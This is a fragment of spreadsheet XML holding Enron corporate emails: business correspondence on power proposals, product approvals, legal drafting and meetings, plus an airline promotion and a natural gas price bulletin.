    <t>frozenset({'benjamin.rogers@enron.com', 'russ.porter@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
_x000D_
do not include SCR's on Lincoln_x000D_
---------------------- Forwarded by Oscar Dalton/HOU/ECT on 01/20/2000 08:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Rich Kosch" &lt;rkosch@les.com&gt; on 01/20/2000 07:16:22 AM_x000D_
To: Oscar Dalton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Questions_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Oscar-the 545 does not include an SCR.  I will need to check on the financial_x000D_
interest and length of time._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Oscar Dalton" &lt;odalton@ect.enron.com&gt; on 01/19/2000 06:26:34 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 To:      Rich Kosch/LES@LES_x000D_
_x000D_
 cc:_x000D_
_x000D_
_x000D_
_x000D_
 Subject: Questions_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rich,_x000D_
_x000D_
In working through our analysis for the revised proposal to Lincoln, I had the_x000D_
following questions:_x000D_
_x000D_
1.  In Lincoln's cost estimate of $545/kw, did this include SCR's?_x000D_
_x000D_
2. Under taxable financing, what interest rate and repayment period would_x000D_
Lincoln normally find acceptable?_x000D_
_x000D_
_x000D_
Any input you could provide would be appreciated._x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
Oscar_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 08:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Tomorrow's Brown Bag</t>
  </si>
  <si>
    <t>Thanks to those of you who have already repsonded.  The last opportunity to _x000D_
enjoy lunch with the A&amp;A brown bag sessions is here.  Please consider this a _x000D_
reminder of the program tomorrow:_x000D_
12:00 to 1:00 Room EB30C1_x000D_
Berney Aucoin, Director of Commodity Structuring _x000D_
_x000D_
Berney will be accompanied by an analyst who can give a unique first hand _x000D_
account of a structuring rotation.  _x000D_
_x000D_
Please RSVP if you're planning to attend._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tom Wilbeck_x000D_
57536</t>
  </si>
  <si>
    <t>Thu, 11 May 2000 01:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Yvan's Application</t>
  </si>
  <si>
    <t>Molly,_x000D_
_x000D_
I am enclosing my recommendation letter for Yvan Chaxel._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bjorn.hagelmann@enron.com', 'jeff.blumenthal@enron.com', 'larry.hunter@enron.com', 'tom.moran@enron.com', 'mark.taylor@enron.com', 'veronica.hill@enron.com'})</t>
  </si>
  <si>
    <t>Product Type Approval (US Residual Fuel Oil Swap)</t>
  </si>
  <si>
    <t>Your review and approval of the following product type in the EOL Datamanager _x000D_
is needed (for directions on approval , please see steps for approval at the _x000D_
bottom of this e-mail)_x000D_
_x000D_
_x000D_
Trader:  Sarah Mulholland_x000D_
_x000D_
US ResidOil Swap Platts No. 6 1%         Apr01           USD/bl/m_x000D_
_x000D_
_x000D_
A US Residual Fuel Oil financial Swap Transaction with Enron North America _x000D_
Corp. under which the Seller pays a Floating Price and the Buyer pays the _x000D_
price submitted by Counterparty on the Website (the Fixed Price) in each case _x000D_
in respect of the Notional Quantity per Determination Period. Each calendar _x000D_
month during the term of the Transaction will be a Determination Period.  The _x000D_
Notional Quantity per Determination Period shall be the volume submitted by _x000D_
Counterparty on the Website.  The Payment Date(s) will be 5 business days _x000D_
after the Floating Price is determinable.  The Floating Price shall be the _x000D_
Index for the relevant Determination Period._x000D_
The term of the Transaction shall be from the Effective Date of 01 Apr 2001 _x000D_
to the Termination Date of 30 Apr 2001._x000D_
The Index used shall be the arithmetic average of the mean of the daily _x000D_
quotations for No. 6, 1%S Max appearing under the heading "New York/Boston _x000D_
Cargo" in the section entitled "Product Price Assessments" for those issues _x000D_
of Platt's Oilgram Price Reports published for the applicable Determination _x000D_
Period._x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be Barrels per _x000D_
month and the quantity shown shall be in Barrels per month._x000D_
_x000D_
_x000D_
STEPS FOR APPROVAL:_x000D_
_x000D_
click the  START button _x000D_
select  PROGRAMS_x000D_
select  TEST APPLICATIONS_x000D_
select ENRONONLINE CLUSTER(PROD)_x000D_
 PROCEED WITH USUAL LOGIN/PASSWORD _x000D_
click the Enron Online Production Cluster "START" button  _x000D_
select EnronOnLine (this is the EOL Datamanager)_x000D_
 PROCEED WITH EOL LOGIN/PASSWORD_x000D_
click on the "+" for EnronOnLine_x000D_
click on the "+" for Product Types_x000D_
click on the "+" for "Awaiting Approval" (OR  "Partially Approved")_x000D_
select the product requiring review as stated in e-mail above_x000D_
Right "mouse" click on "properties" to view product set-up _x000D_
TO APPROVE:  Right mouse click on "Approved"</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 19:56:32 -0800 (PST)</t>
  </si>
  <si>
    <t>Job description</t>
  </si>
  <si>
    <t>Karen,_x000D_
 _x000D_
Here is my job description. I tried to make it broad to fit my possible move to another groups on the trading floor._x000D_
 _x000D_
Please let me know if you need any additional information._x000D_
 _x000D_
Vladi.</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 06:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rebecca.miles@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'james.britton@enron.com', 'steve.frazier@enron.com', 'allen.ueckert@enron.com', 'jo.hill@enron.com', 'mary.perkins@enron.com', 'elaine.schield@enron.com', 'biren.kumar@enron.com', 'elise.clark@enron.com', 'john.gillespie@enron.com', 'sally.beck@enron.com', 'thao.nguyen@enron.com', 'matthew.huddleston@enron.com', 'greg.lewis@enron.com'})</t>
  </si>
  <si>
    <t>SAP Business Unit Optimization</t>
  </si>
  <si>
    <t>Now that SAP is in place, it's time to focus our attention on how to maximize _x000D_
the investment in SAP for Enron and for each business area.  You have been _x000D_
selected (whether officially or in an unofficial capacity) to represent a _x000D_
business area's SAP needs and wants for 2001.  In this capacity, you will be _x000D_
a major part of building upon Enron's SAP investment.  Your partners in this _x000D_
adventure will be the ISC.  _x000D_
_x000D_
The Customer Relations solution area of the ISC invites you to join the ISC _x000D_
leadership to kick off 2001.  We'll be facilitating introductions and _x000D_
providing an overview of the roles and responsibilities of both the business _x000D_
area representatives and ISC leadership.  _x000D_
_x000D_
The goals of the kick-off are to:_x000D_
_x000D_
Clarify the roles and responsibilities of the ISC leadership and the business _x000D_
area representatives_x000D_
Prepare the business area representatives for the SAP User Group kick-off in _x000D_
February_x000D_
Begin developing the SAP "wish list" for 2001_x000D_
Have a little fun getting to know one another_x000D_
_x000D_
An agenda will be sent the week of January 8.  Please join us._x000D_
_x000D_
Date:  Wednesday, January 17_x000D_
Time:  8:45 - 9:45 a.m._x000D_
Location:   EB 5C2 _x000D_
_x000D_
Coffee and pastries will be served.  Please RSVP to Margarite Cunningham at _x000D_
x5-6130.</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 15:05:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'carol.st.@enron.com', 'elizabeth.sager@enron.com'})</t>
  </si>
  <si>
    <t>FW: Triangular setoff</t>
  </si>
  <si>
    <t xml:space="preserve">FYI.  You won't hear from me again until I have a constructive solution to this potentially insolveable problem._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"ROBERT ANDERSON" &lt;robert.anderson@blakes.com&gt;@ENRON [mailto:IMCEANOTES-+22ROBERT+20ANDERSON+22+20+3Crobert+2Eanderson+40blakes+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, August 09, 2001 2:39 PM_x000D_
To:	Keohane, Peter_x000D_
Subject:	Triangular setoff_x000D_
_x000D_
The draft I sent you of the triangular setoff provision may still require significant revision. I have the following primary concerns which are not easily reconciled:_x000D_
_x000D_
1. for an assignment to be effective it must take effect prior to bankruptcy or mutuality will be lost by the interposition of a bankruptcy trustee;_x000D_
_x000D_
2. although words of present assignment are used,  under the current wording the assignment probably does not occur at least until there is a defaulting party;_x000D_
_x000D_
3. if we should wish to characterize it as a general assignment for security purposes (perfection of which would require registration), there does appear to be any obligation  between X and XA (as opposed to Y) for which the assignment is to secure performance._x000D_
_x000D_
When you are available, I would like to speak to you regarding the foregoing._x000D_
Regards,_x000D_
_x000D_
_x000D_
_x000D_
A. Robert Anderson_x000D_
Blake, Cassels &amp; Graydon LLP_x000D_
3500, 855 Second Street SW_x000D_
Calgary, AB  T2P 4J8_x000D_
_x000D_
Tel: 403.260-9624_x000D_
Fax: 403.260.9700_x000D_
E-mail: raa@blakes.com_x000D_
_x000D_
This e-mail communication is confidential and legally privileged. If you are not the intended recipient, please notify me at the telephone number shown above or by return e-mail and delete this communication and any copy immediately. Thank you._x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 10:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rgrove@isda.org'})</t>
  </si>
  <si>
    <t>Re: E-Commerce Forum</t>
  </si>
  <si>
    <t>Rick:_x000D_
_x000D_
As you know, Clinton should sign, over the next couple of days, legislation _x000D_
on electronic signatures.  There is a big need to standardize the approach _x000D_
with respect to e-signatures on trading contracts and maybe confirmations.  I _x000D_
think this is an area that ISDA could provide leadership and possibly make _x000D_
money through a protocol.  Let me know what you think._x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Tue, 1 Jan 2002 18:55:33 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">continental.com Specials for Grace Blair_x000D_
Wednesday, January 2, 2002_x000D_
****************************************_x000D_
_x000D_
HAPPY NEW YEAR!_x000D_
_x000D_
Continental makes it easy to unwind with an additional 10% off select sale fares to destinations in North America and Europe.  Hurry, seats are limited and this sale ends January 15, 2002._x000D_
_x000D_
Purchase your eTickets now at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*VA_x000D_
_x000D_
_x000D_
EARN UP TO 20,000 BONUS MILES*_x000D_
Now through February 15, 2002, we'll reward you with additional OnePass miles every time you purchase an eTicket on continental.com and fly - and that's in addition to your actual flight miles._x000D_
View all the details and register at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*WA_x000D_
_x000D_
_x000D_
Not a OnePass Member? Enroll instantly at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*XA_x000D_
_x000D_
* Note: Bonus Mile offer does not apply to continental.com Specials._x000D_
_x000D_
TRAVEL UPDATES_x000D_
Be sure to check continental.com at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*YA_x000D_
before leaving for the airport. We're looking forward to welcoming you onboard!_x000D_
_x000D_
****************************************_x000D_
TABLE OF CONTENTS_x000D_
1. This Week's Destinations_x000D_
2. Hilton Hotels &amp; Resorts, Doubletree Hotels &amp; Resorts, &amp; Embassy Suites Hotels Offers_x000D_
3. Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts, Four Points by Sheraton, St. Regis, The Luxury Collection and W Hotels Offers_x000D_
4. Alamo Rent A Car Offers_x000D_
5. National Car Rental Offers_x000D_
_x000D_
****************************************_x000D_
1. THIS WEEK'S DESTINATIONS_x000D_
_x000D_
Depart Saturday, January 5 and return on either Monday, January 7 or Tuesday, January 8, 2002. Please see the Terms and Conditions listed at the end of this e-mail._x000D_
_x000D_
Purchase continental.com Specials online until 11:59pm (CST) Friday at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*ZA_x000D_
You can also purchase continental.com Specials for an additional cost of $20 per ticket through our telephone service at 1-800-642-1617._x000D_
_x000D_
**********************************************_x000D_
ROUND-TRIP TRAVEL MAY ORIGINATE IN EITHER CITY_x000D_
**********************************************_x000D_
****Roundtrip BETWEEN CLEVELAND, OH and:_x000D_
_x000D_
$119 - Milwaukee, WI_x000D_
_x000D_
****Roundtrip BETWEEN HOUSTON, TX and:_x000D_
_x000D_
$109 - Alexandria, LA_x000D_
$119 - Amarillo, TX_x000D_
$109 - Beaumont/Pt. Arthur, TX_x000D_
$109 - Gulfport/Biloxi, MS_x000D_
$119 - Tulsa, OK_x000D_
_x000D_
****Roundtrip BETWEEN NEW YORK/NEWARK and:_x000D_
_x000D_
$119 - Albany, NY_x000D_
$119 - Greensboro/Piedmont Triad, NC_x000D_
$159 - Kansas City, MO_x000D_
$129 - Nashville, TN_x000D_
$159 - New Orleans, LA_x000D_
$109 - Norfolk, VA_x000D_
$109 - Portland, ME_x000D_
$109 - Richmond, VA_x000D_
$109 - Syracuse, NY_x000D_
_x000D_
_x000D_
********************************_x000D_
2. CONTINENTAL.COM SPECIALS FROM HILTON HOTELS AND RESORTS, DOUBLETREE_x000D_
HOTELS AND RESORTS, AND EMBASSY SUITES HOTELS_x000D_
_x000D_
The following rates are available January 5 - January 7, 2002 and are priced per night._x000D_
--------------------------------------_x000D_
Cleveland, OH - Hilton Garden Inn, Cleveland Airport - $79_x000D_
_x000D_
Houston, TX - Embassy Suites Hotel Houston, Near The Galleria - $130_x000D_
Houston, TX - Hilton Houston Hobby Airport - $88_x000D_
Houston, TX - Hilton Houston Westchase and Towers - $149_x000D_
_x000D_
Nashville, TN - Hilton Suites Nashville, Downtown - $109_x000D_
_x000D_
Newark, NJ - Doubletree Club Suites Jersey City, Jersey City  NJ - $149 (January 5-6 only)_x000D_
Newark, NJ - Hilton Pearl River, Pearl River  NY - $125_x000D_
_x000D_
_x000D_
To book this week's special rates for Hilton Family Hotels, visit and book at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*AA_x000D_
Special rates apply only for the dates listed at each hotel and are subject to availability. Check hilton.com for specific dates at each Hilton Family Hotel. Or call at 1-800-774-1500 and ask for Value Rates. Restrictions apply to these rates._x000D_
_x000D_
****************************************_x000D_
3. CONTINENTAL.COM SPECIALS LAST-MINUTE WEEKEND RATES FROM WESTIN HOTELS &amp; RESORTS, SHERATON HOTELS &amp; RESORTS, FOUR POINTS BY SHERATON, ST. REGIS, THE LUXURY COLLECTION, AND W HOTELS_x000D_
_x000D_
There are no offerings from Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts, Four Points by Sheraton, St. Regis, The Luxury Collection and W Hotels this week._x000D_
_x000D_
_x000D_
********************************_x000D_
4. CONTINENTAL.COM SPECIALS FROM ALAMO RENT A CAR_x000D_
_x000D_
Rates listed below are valid on compact class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, January 5 with returns Monday, January 7 or Tuesday, January 8, 2002._x000D_
-------------------------------_x000D_
$17 a day in: Milwaukee, WI (MKE)_x000D_
$18 a day in: Greensboro/Piedmont Triad, NC (GSO)_x000D_
$18 a day in: Houston, TX (IAH)_x000D_
$18 a day in: Kansas City, MO (MCI)_x000D_
$18 a day in: Nashville, TN (BNA)_x000D_
$18 a day in: Tulsa, OK (TUL)_x000D_
$20 a day in: Cleveland, OH (CLE)_x000D_
$26 a day in: New Orleans, LA (MSY)_x000D_
$26 a day in: Newark, NJ (EWR)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make advance reservations and be sure to request ID # 596871 and Rate Code 33. Book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*BA_x000D_
or contact Alamo at 1-800 GO ALAMO._x000D_
_x000D_
*If you are traveling to a city or a different date that is not listed, Alamo offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*CA_x000D_
For complete details on these offers, please refer to Alamo's terms and conditions below._x000D_
_x000D_
****************************************_x000D_
5. CONTINENTAL.COM SPECIALS FROM NATIONAL CAR RENTAL_x000D_
_x000D_
Rates listed below are valid on intermediate class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, January 5 with returns Monday, January 7 or Tuesday, January 8, 2002._x000D_
------------------------------------------_x000D_
$21 a day in: Amarillo, TX (AMA)_x000D_
$21 a day in: Greensboro/Piedmont Triad, NC (GSO)_x000D_
$21 a day in: Gulfport/Biloxi, MS (GPT)_x000D_
$21 a day in: Houston, TX (IAH)_x000D_
$21 a day in: Kansas City, MO (MCI)_x000D_
$21 a day in: Nashville, TN (BNA)_x000D_
$21 a day in: Syracuse, NY (SYR)_x000D_
$21 a day in: Tulsa, OK (TUL)_x000D_
$23 a day in: Cleveland, OH (CLE)_x000D_
$28 a day in: Alexandria, LA (AEX)_x000D_
$28 a day in: Norfolk, VA (ORF)_x000D_
$28 a day in: Richmond, VA (RIC)_x000D_
$29 a day in: New Orleans, LA (MSY)_x000D_
$29 a day in: Newark, NJ (EWR)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make your reservations in advance and be sure to request Product Code COOLUS. To make your reservation, contact National at 1-800-CAR-RENT (1-800-227-7368), or book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*DA_x000D_
Please enter COOLUS in the Product Rate Code field, and 5037126 in the Contract ID field to ensure you get these rates on these dates._x000D_
_x000D_
* If you are traveling to a city or a different date that is not listed, National offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*VUA_x000D_
For complete details on these offers, please refer to National's terms and conditions below._x000D_
_x000D_
****************************************_x000D_
CONTINENTAL.COM SPECIALS RULES:_x000D_
Fares include a $37.20 fuel surcharge.  Passenger Facility Charges, up to $18 depending on routing, are not included. Up to $2.75 per segment federal excise tax, as applicable, is not included.  Applicable International and or Canadian taxes and fees up to $108, varying by destination, are not included and may vary slightly depending on currency exchange rate at the time of purchase. For a complete listing of rules please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*VVA_x000D_
_x000D_
_x000D_
ALAMO RENT A CAR'S TERMS AND CONDITIONS:_x000D_
Taxes (including VLF taxes up to US$1.89 per day in California and GST), other governmentally-authorized or imposed surcharges, license recoupment fees, fuel, additional driver fee, drop charges and optional items (such as CDW Waiver Savers(R) up to US$18.99 a day,) are extra. Renter must meet standard age, driver and credit requirements. Rates higher for drivers under age 25. Concession recoupment fees may add up to 14% to the rental rate at some on-airport locations. Up to 10.75% may be added to the rental rate if you rent at an off-airport location and exit on our shuttle bus. Weekly rates require a 5-day minimum rental or daily rates apply. For weekend rates, the vehicle must be picked up after 9 a.m. on Thursday and returned before midnight on Monday or higher daily rates apply. 24-hour advance reservation required. May not be combined with other discounts. Availability is limited. All vehicles must be returned to the country of origin. Offer not valid in San Jose, CA._x000D_
_x000D_
NATIONAL CAR RENTAL TERMS AND CONDITIONS:_x000D_
Customer must provide Contract ID# at the time of reservation to be eligible for discounts. Offer valid at participating National locations in the US and Canada. Minimum rental age is 25. This offer is not valid with any other special discount or promotion. Standard rental qualifications apply. Subject to availability and blackout dates. Advance reservations required. Geographic driving restrictions may apply._x000D_
_x000D_
TERMS AND CONDITIONS FOR WESTIN, SHERATON, FOUR POINTS,_x000D_
ST. REGIS, THE LUXURY COLLECTION, AND W HOTELS:_x000D_
Offer is subject to availability. Advance Reservations required and is based on single/double occupancy. Offer not applicable to group travel. Additional Service charge and tax may apply. The discount is reflected in the rate quoted. Offer valid at participating hotel only. Offer valid for stays on Fri - Mon with a Friday or Saturday night arrival required. Rate available for this coming weekend only. Offer available only by making reservations via the internet. A limited number of rooms may be available at these rates._x000D_
_x000D_
---------------------------------------_x000D_
This e-mail message and its contents are copyrighted and are proprietary products of Continental Airlines, Inc. Any unauthorized use, reproduction, or transfer of the message or its content, in any medium, is strictly prohibited._x000D_
_x000D_
****************************************_x000D_
If you need assistance please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*VWA_x000D_
View our privacy policy at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*VXA_x000D_
_x000D_
This e-mail was sent to: gblair@enron.com_x000D_
_x000D_
TO UNSUBSCRIBE:_x000D_
We hope you will find continental.com Specials a valuable source of information. However, if you prefer not to take advantage of this opportunity, please let us know by visiting the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*VZA_x000D_
_x000D_
TO SUBSCRIBE:_x000D_
Please visit the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc4?JHEVAA*nIsHpkQLgkhgEJht*z*VYA_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 06:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Affiliates Using MG as Broker</t>
  </si>
  <si>
    <t>Please call John Arnold and ask him where the traders are coming out on _x000D_
this.  Let me know.  Mark</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 12:13:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'simon.cheshire@reuters.com'})</t>
  </si>
  <si>
    <t>Confirmation for meeting on Friday at 1.00pm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi Andy,_x000D_
_x000D_
I just wanted to do a note to confirm that Jim Perrello will be visiting you at_x000D_
1.00pm this Friday.  I have attached a recent press release we issued announcing_x000D_
Jim's appointment as CEO of Reuters Liquid Markets.  As discussed, the goal of_x000D_
Friday's meeting is for Jim to provide feedback on the applicability of the_x000D_
EnronOnline technology to the financial markets and particularly if, with little_x000D_
customization, it could be used in the commercial paper marketplace._x000D_
_x000D_
I have copied Jim and would appreciate if you could email the details of where_x000D_
he should go on Friday._x000D_
_x000D_
Cheers,_x000D_
Simon_x000D_
_x000D_
(See attached file: LM press release.htm)_x000D_
_x000D_
_x000D_
-----------------------------------------------------------------_x000D_
        Visit our Internet site at http://www.reuters.com_x000D_
_x000D_
Any views expressed in this message are those of  the  individual_x000D_
sender,  except  where  the sender specifically states them to be_x000D_
the views of Reuters Ltd._x000D_
_x000D_
 - LM press release.htm </t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 23:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Form for Blue Dog</t>
  </si>
  <si>
    <t>Hi Carolyn,_x000D_
_x000D_
Could you check this and see if I did anything stupid with the revisions:_x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 31 Mar 2000 08:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the revised letter agreement between EES and Enron Corp._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: David Roland/HOU/EES@EES_x000D_
cc: Sara Shackleton/HOU/ECT@ECT, Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Re: letter agreement between EES and Enron Corp.  _x000D_
_x000D_
_x000D_
Sara and Gareth,_x000D_
_x000D_
We still need to finish this agreement and have it signed.  To my knowledge, _x000D_
it has not been completed and signed._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  David Roland                           03/30/2000 06:11 PM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc: Gareth Bahlmann/HOU/ECT@ECT _x000D_
Subject: Re: letter agreement between EES and Enron Corp.  _x000D_
_x000D_
_x000D_
Sara,_x000D_
_x000D_
I'm on someone else's computer - I'm having all sorts of e-mail problems _x000D_
today._x000D_
_x000D_
The business person on the  EES side to be signing this letter would be Mark _x000D_
S. Muller.  He is a Managing Director of EES LLC._x000D_
_x000D_
I don't necessarily have a problem with the description of the back-to-back _x000D_
obligations, but I'd like to know Gareth's opinion as to whether the language _x000D_
is too broad._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton@ECT_x000D_
03/30/2000 04:38 PM_x000D_
To: David Roland/HOU/EES@EES, Gareth Bahlmann/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: letter agreement between EES and Enron Corp._x000D_
_x000D_
Attached is a first stab at the agreement.  Please comment._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2001 06:59:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sherenehess@yourinter.net'})</t>
  </si>
  <si>
    <t>Oh my perhaps I've given you the wrong idea about the sophistication of Chad's rock collection.  It consists of rocks he has picked up at the park and a few gems he bought at a museum.  He would love anything about rocks._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 10:06:13 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
IntercontinentalExchange _x000D_
Firm Physical Natural Gas Price Bulletin _x000D_
For Natural Gas Delivered on Wednesday, November 21, 2001 _x000D_
(Trade Date of Tuesday, November 20, 2001) _x000D_
Click here to access index history. _x000D_
* volume represents sell-side only * _x000D_
 Region     Hub 	 High 	 Low 	 Wtd Avg Index 	 Change ($) 	 Vol (mmBtu) 	 Hub Name 	_x000D_
  LOUISIANA 	   	   	   	   	   	   	_x000D_
     ANR SE 	 $2.7900 	 $2.1000 	 $2.6126 	 +.5901 	 222,600 	 American Natural Resources Pipeline Co. - SE Transmission Pool 	_x000D_
     Columbia Onshore 	 $2.7450 	 $2.1500 	 $2.5128 	 +.3097 	 305,200 	 Columbia Gulf Transmission Co. - Onshore Pool  	_x000D_
     Henry Hub 	 $2.8200 	 $2.2200 	 $2.6180 	 +.5406 	 1,538,500 	 Henry Hub tailgate - Louisiana  	_x000D_
     NGPL LA 	 $2.7400 	 $2.0550 	 $2.5180 	 +.5460 	 287,900 	 Natural Gas Pipeline Co. of America, Louisiana Pool  	_x000D_
     Tenn 500L 	 $2.7400 	 $2.2800 	 $2.5295 	 +.4989 	 275,100 	 Tennessee Gas Pipeline Co.-Zone L, 500 Leg Pool  	_x000D_
     Tenn 800L 	 $2.7300 	 $2.2450 	 $2.4840 	 +.4767 	 248,800 	 Tennessee Gas Pipeline Co.-Zone L, 800 Leg Pool  	_x000D_
     TETCO ELA 	 $2.7900 	 $2.2500 	 $2.5993 	 +.4619 	 164,900 	 Texas Eastern - East LA  	_x000D_
     TETCO WLA 	 $2.7700 	 $2.3300 	 $2.5976 	 +.6778 	 208,300 	 Texas Eastern - West LA  	_x000D_
     Transco 65 	 $2.8200 	 $2.3000 	 $2.6756 	 +.5535 	 176,100 	 Transco - Station 65  	_x000D_
     Trunkline ELA 	 $2.7600 	 $2.0000 	 $2.5481 	 +.5686 	 82,500 	 Trunkline Gas Company - East Louisiana Pool  	_x000D_
     TxGas SL 	 $2.8400 	 $2.2800 	 $2.6244 	 +.5326 	 245,000 	 Texas Gas Transmission Corp.-Zone SL FT Pool  	_x000D_
  MIDCONTINENT 	   	   	   	   	   	   	_x000D_
     MichCon, citygate 	 $2.9000 	 $2.2500 	 $2.8052 	 +.6308 	 219,800 	 Michigan Consolidated  	_x000D_
     NGPL Midcont 	 $2.5900 	 $2.2300 	 $2.4805 	 +.6875 	 221,700 	 Natural Gas Pipeline Co. of America, Mid-Continent Pool  	_x000D_
     NGPL Nicor, citygate 	 $2.7975 	 $2.1300 	 $2.6082 	 +.5992 	 1,231,800 	 Natural Gas Pipeline Co. of America, Nicor Citygate 	_x000D_
     NGPL NIPSCO, citygate 	 $2.8000 	 $2.5400 	 $2.7380 	 +.7435 	 107,500 	 Natural Gas Pipeline Co. of America, Nipsco Citygate 	_x000D_
     NNG Demarcation 	 $2.7000 	 $2.1250 	 $2.4831 	 +.4382 	 214,200 	 Northern Natural Gas, Demarcation Pool  	_x000D_
  NORTHEAST 	   	   	   	   	   	   	_x000D_
     Columbia TCO 	 $2.9100 	 $2.2900 	 $2.7287 	 +.5870 	 533,300 	 Columbia Gas Co. - TCO Pool  	_x000D_
     Dominion So.Point 	 $3.1000 	 $2.7800 	 $2.8973 	 +.5502 	 235,300 	 Dominion - South Point  	_x000D_
     TETCO M3 	 $3.3100 	 $2.8000 	 $3.0520 	 +.5224 	 218,400 	 Texas Eastern - M3 Zone  	_x000D_
     Transco Z-6 (NY) 	 $3.4100 	 $2.9000 	 $3.2445 	 +.6188 	 100,000 	 Transcontinental Gas Pipe Line Corp. - Zone 6 (NY) 	_x000D_
  WEST 	   	   	   	   	   	   	_x000D_
     El Paso non-Bondad 	 $2.4500 	 $2.1600 	 $2.3522 	 +.6445 	 183,900 	 El Paso - San Juan Basin, Blanco Pool 	_x000D_
     Huntingdon/Sumas 	 $2.4500 	 $2.3200 	 $2.3958 	 +.5708 	 126,000 	 Westcoast Energy &amp; Northwest Pipeline Corp. 	_x000D_
     Opal 	 $2.4100 	 $1.9600 	 $2.2514 	 +.6931 	 109,800 	 Opal 	_x000D_
